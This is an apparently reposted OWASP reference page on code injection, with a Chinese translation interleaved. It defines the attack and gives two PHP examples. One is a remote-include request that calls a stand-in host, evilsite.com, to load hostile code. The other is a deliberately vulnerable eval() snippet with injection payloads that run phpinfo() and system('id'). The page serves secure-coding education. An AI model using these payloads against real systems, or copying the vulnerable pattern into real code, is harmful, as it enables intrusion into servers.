Description
Code Injection is the general term for attack types which consist of injecting code that is then interpreted/executed by the application. This type of attack exploits poor handling of untrusted data. These types of attacks are usually made possible due to a lack of proper input/output data validation, for example:
代码注入是攻击类型的总称,它包括注入代码,然后由应用程序解释/执行。 这种类型的攻击利用对不可信数据的不良处理。 由于缺乏适当的输入/输出数据验证,这些类型的攻击通常是可能的,例如
allowed characters (standard regular expressions classes or custom)
data format
amount of expected data
Code Injection differs from Command Injection in that an attacker is only limited by the functionality of the injected language itself. If an attacker is able to inject PHP code into an application and have it executed, they are only limited by what PHP is capable of. Command injection consists of leveraging existing code to execute commands, usually within the context of a shell.
允许的字符(标准正则表达式类或自定义)
数据格式
预期数据量
代码注入与命令注入的不同之处在于,攻击者仅受注入语言本身的功能限制。 如果攻击者能够将 PHP 代码注入应用程序并使其执行,那么他们只会受到 PHP 能力的限制。 命令注入包括利用现有代码来执行命令,通常是在 shell 的上下文中。
Risk Factors
These types of vulnerabilities can range from very hard to find, to easy to find. If found, are usually moderately hard to exploit, depending of scenario
If successfully exploited, impact could cover loss of confidentiality, loss of integrity, loss of availability, and/or loss of accountability.
这些类型的漏洞可以从很难找到到很容易找到
如果找到,通常很难利用,具体取决于场景
如果成功利用,影响可能包括机密性丧失、完整性丧失、可用性丧失和/或责任丧失
Examples
Example 1
If an application passes a parameter sent via a GET request to the PHP include() function with no input validation, the attacker may try to execute code other than what the developer had in mind.
The URL below passes a page name to the include() function. http://testsite.com/index.php?page=contact.php
The file “evilcode.php” may contain, for example, the phpinfo() function which is useful for gaining information about the configuration of the environment in which the web service runs. An attacker can ask the application to execute their PHP code using the following request: http://testsite.com/?page=http://evilsite.com/evilcode.php
Example 2
When a developer uses the PHP eval() function and passes it untrusted data that an attacker can modify, code injection could be possible.
The example below shows a dangerous way to use the eval() function:
$myvar = "varname";
$x = $_GET['arg'];
eval("$myvar = $x;");
As there is no input validation, the code above is vulnerable to a Code Injection attack.
For example: /index.php?arg=1; phpinfo()
While exploiting bugs like these, an attacker may want to execute system commands. In this case, a code injection bug can also be used for command injection, for example: /index.php?arg=1; system('id')
原文链接:https://owasp.org/www-community/attacks/Code_Injection